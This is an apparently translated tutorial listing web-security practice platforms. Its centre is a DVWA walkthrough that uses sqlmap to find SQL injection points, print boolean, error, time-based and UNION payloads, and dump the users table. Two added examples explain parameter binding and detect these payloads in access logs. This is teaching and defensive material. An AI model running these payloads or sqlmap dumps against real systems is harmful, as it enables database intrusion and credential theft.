Web Attack and Defense Practice Platforms

DVWA : Damn Vulnerable Web Application

A web vulnerability testing application written in PHP + MySQL for teaching and testing common web vulnerabilities. It contains common security flaws such as SQL injection, XSS and blind SQL injection.

Installation

$ wget https://github.com/RandomStorm/DVWA/archive/v1.9.zip
$ unzip v1.9.zip
$ sudo cp -rp DVWA-1.9 /var/www/html/dvwa

Install the required packages:

$ sudo apt-get -y install apache2 mysql-server php5 php5-mysql php5-gd  spawn-fcgi php5-cgi

Configure nginx + PHP

$ sudo vim /etc/nginx/sites-available/default

server_name localhost;

# Add index.php to the list if you are using PHP
index index.php index.html index.htm index.nginx-debian.html;

# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location ~ \.php$ {
    include snippets/fastcgi-php.conf;

    # With php5-cgi alone:
    fastcgi_pass 127.0.0.1:9000;
    # With php5-fpm:
    #fastcgi_pass unix:/var/run/php5-fpm.sock;
}

Startup

Start nginx + PHP:

$ sudo spawn-fcgi -a 127.0.0.1 -p 9000 -C 10 -u www-data -f /usr/bin/php5-cgi
$ sudo /etc/init.d/nginx start

Visit localhost/dvwa/setup.php to complete the setup.

Configure MySQL

$ sudo /etc/init.d/mysql start

If dvwa/setup.php reports an error while creating the database, set the database password in ./config/config.inc.php to an empty string.

Once the database has been created, log in to DVWA; the default username/password is admin/password.

Testing SQL injection with sqlmap.py

First set the security level to Low under DVWA Security.

Then, in the SQL Injection section, capture the session cookie and start looking for injection points.

Finding the injection point

$ export target="http://192.168.1.108/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"
$ python sqlmap.py -u $target --cookie="security=low; security=impossible; PHPSESSID=0qrratc24em680l0bucocti4v6"

sqlmap identified the following injection point(s) with a total of 3814 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3459=3459 AND 'CsJK'='CsJK&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 2212 FROM(SELECT COUNT(*),CONCAT(0x716a7a7171,(SELECT (ELT(2212=2212,1))),0x7176627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kuZo'='kuZo&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))zYYB) AND 'XUNc'='XUNc&Submit=Submit

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x716a7a7171,0x70695670544345415271684e6f4c6975425959654447454149744f47707261797a7245716462547a,0x7176627171),NULL-- -&Submit=Submit
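Why sqlmap's boolean-based probe works against the Low level, and why binding the parameter stops it, shown as an added example that is not part of the original post or of DVWA's code. It uses an in-memory SQLite table (the `users` schema here is a constructed stand-in with only two columns, not DVWA's real table), the true/false probe pair from the sqlmap output above, and the hypothetical function names `lookup_unsafe` and `lookup_safe`:

```python
import sqlite3

# Constructed stand-in for DVWA's users table: only the two columns this demo needs.
SAMPLE_USERS = [(1, "admin"), (2, "gordonb"), (3, "1337")]

# The "true" probe sqlmap reported above, plus a "false" twin with one digit changed.
TRUE_PROBE = "1' AND 3459=3459 AND 'CsJK'='CsJK"
FALSE_PROBE = "1' AND 3459=3460 AND 'CsJK'='CsJK"


def make_db():
    """In-memory SQLite database standing in for the MySQL 'dvwa' database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_unsafe(conn, user_id):
    """Interpolates the id into a single-quoted literal, the pattern DVWA's Low level uses (in PHP)."""
    query = "SELECT first_name FROM users WHERE user_id = '%s'" % user_id
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, user_id):
    """Binds the id as a parameter; the driver never lets it change the statement's structure."""
    query = "SELECT first_name FROM users WHERE user_id = ?"
    return [row[0] for row in conn.execute(query, (user_id,))]


def blind_oracle_exists(conn, lookup):
    """True when the true/false probe pair yields different results, i.e. the
    endpoint exposes the yes/no oracle that boolean-based blind injection relies on."""
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("unsafe", lookup_unsafe), ("safe", lookup_safe)):
        print(name, "id=1        ->", fn(db, "1"))
        print(name, "true probe  ->", fn(db, TRUE_PROBE))
        print(name, "false probe ->", fn(db, FALSE_PROBE))
        print(name, "boolean oracle present:", blind_oracle_exists(db, fn))
```

With string interpolation the two probes return different rows, which is exactly the one-bit oracle sqlmap drives 3814 times in the run above; with a bound parameter both probes are just an unmatched literal and return nothing, so the oracle disappears. The same fix in PHP is a prepared statement via PDO or mysqli, which is what DVWA's Impossible level does.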

Using the SQL injection to extract further information

$ python sqlmap.py -u $target --cookie="security=low; security=impossible; PHPSESSID=0qrratc24em680l0bucocti4v6" --current-db

current database: 'dvwa'

$ python sqlmap.py -u $target --cookie="security=low; security=impossible; PHPSESSID=0qrratc24em680l0bucocti4v6" --current-db --tables -Ddvwa

Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

$ python sqlmap.py -u $target --cookie="security=low; security=impossible; PHPSESSID=0qrratc24em680l0bucocti4v6" -T guestbook --columns

Database: dvwa
Table: guestbook
[3 columns]
+------------+----------------------+
| Column     | Type                 |
+------------+----------------------+
| comment    | varchar(300)         |
| comment_id | smallint(5) unsigned |
| name       | varchar(100)         |
+------------+----------------------+

$ python sqlmap.py -u $target --cookie="security=low; security=impossible; PHPSESSID=0qrratc24em680l0bucocti4v6" -T users --dump

Database: dvwa
Table: users
[5 entries]
.....
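The defender's view of the same run, as an added example that is not from the post or from sqlmap: a small Python classifier that reads web-server access-log lines, percent-decodes the query string and tags each request with the technique family it matches (the four families in the sqlmap output above), then flags clients either by technique or by request volume alone, since the run above cost 3814 requests. The log lines, the client addresses and the `sqlmap/1.0` user agent are constructed sample data, the UNION payload's hex string is abbreviated, and the function names are hypothetical:

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# One regex per technique family that sqlmap reported against DVWA above.
TECHNIQUES = {
    "boolean-blind": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(|INFORMATION_SCHEMA", re.I),
    "time-blind": re.compile(r"\bSLEEP\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

# nginx/Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "[^"]*" "(?P<ua>[^"]*)"'
)


def classify(url):
    """Sorted technique names whose pattern matches any percent-decoded query value."""
    hits = set()
    for values in parse_qs(urlsplit(url).query, keep_blank_values=True).values():
        for value in values:
            for name, pattern in TECHNIQUES.items():
                if pattern.search(value):
                    hits.add(name)
    return sorted(hits)


def parse_line(line):
    """Parse one combined-format line into a dict; None when the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["techniques"] = classify(rec["url"])
    return rec


def summarize(lines, volume_threshold=50):
    """Per-client request count and technique set. A client is marked suspect when any
    technique matched or when its request count alone reaches the volume threshold."""
    per_ip = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = per_ip.setdefault(rec["ip"], {"requests": 0, "techniques": set(), "user_agents": set()})
        entry["requests"] += 1
        entry["techniques"].update(rec["techniques"])
        entry["user_agents"].add(rec["ua"])
    for entry in per_ip.values():
        entry["suspect"] = bool(entry["techniques"]) or entry["requests"] >= volume_threshold
    return per_ip


def log_line(ip, id_value, ua="Mozilla/5.0"):
    """Build a constructed access-log line for the DVWA sqli page (sample data, not a real capture)."""
    url = "/dvwa/vulnerabilities/sqli/?id=%s&Submit=Submit" % quote(id_value, safe="")
    return '%s - - [10/Oct/2016:13:55:36 +0000] "GET %s HTTP/1.1" 200 4312 "-" "%s"' % (ip, url, ua)


# Constructed sample: one normal visitor plus the four payload families from the sqlmap output above.
SAMPLE_LOG = [
    log_line("10.0.0.5", "1"),
    log_line("192.168.1.50", "1' AND 3459=3459 AND 'CsJK'='CsJK", "sqlmap/1.0"),
    log_line("192.168.1.50", "1' AND (SELECT 2212 FROM(SELECT COUNT(*),CONCAT(0x716a7a7171,"
             "(SELECT (ELT(2212=2212,1))),0x7176627171,FLOOR(RAND(0)*2))x FROM "
             "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kuZo'='kuZo", "sqlmap/1.0"),
    log_line("192.168.1.50", "1' AND (SELECT * FROM (SELECT(SLEEP(5)))zYYB) AND 'XUNc'='XUNc", "sqlmap/1.0"),
    log_line("192.168.1.50", "1' UNION ALL SELECT CONCAT(0x716a7a7171,0x7069,0x7176627171),NULL-- -", "sqlmap/1.0"),
]

if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG).items():
        print(ip, entry["requests"], sorted(entry["techniques"]), "suspect" if entry["suspect"] else "ok")
```

The regexes are deliberately narrow, keyed to the payload shapes on this page, so treat them as a starting signature set rather than a WAF; the per-client volume threshold catches a tool that has switched to encodings the patterns miss, and the user-agent set is kept because sqlmap's default agent is an easy first filter even though it can be changed.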

DVWA-WooYun

A PHP + MySQL vulnerability practice environment based on DVWA. Interesting vulnerability reports from the WooYun main site are modelled and reproduced as plugins for users of the software, giving WooYun's white hats a realism that reading a report cannot, so that through hands-on practice they can fully understand each vulnerability's root cause and how it is exploited.

Metasploitable

http://downloads.metasploit.com/data/metasploitable/metasploitable-linux-2.0.0.zip

WebGoat

A deliberately insecure J2EE web application maintained by the well-known OWASP. Its vulnerabilities are not bugs in the program; they were designed in on purpose to teach web application security lessons. The application provides a realistic teaching environment and gives users hints for completing each lesson.

http://code.google.com/p/webgoat

ZVulDrill

A web vulnerability practice platform.

https://github.com/710leo/ZVulDrill

XCTF_OJ(X Capture The Flag Online Judge)

http://oj.xctf.org.cn/

XCTF-OJ (X Capture The Flag Online Judge) is a cybersecurity competition practice platform developed by the XCTF organizing committee for participants in the XCTF league.

The XCTF-OJ platform gathers real challenges from domestic and international CTF competitions and can restore the online interactive environment for some of them. Future XCTF league events will also upload their offline challenge files and online interactive environments to XCTF-OJ after each event, making it currently the only site in the global CTF community that offers an environment for replaying and reviewing past challenges.

References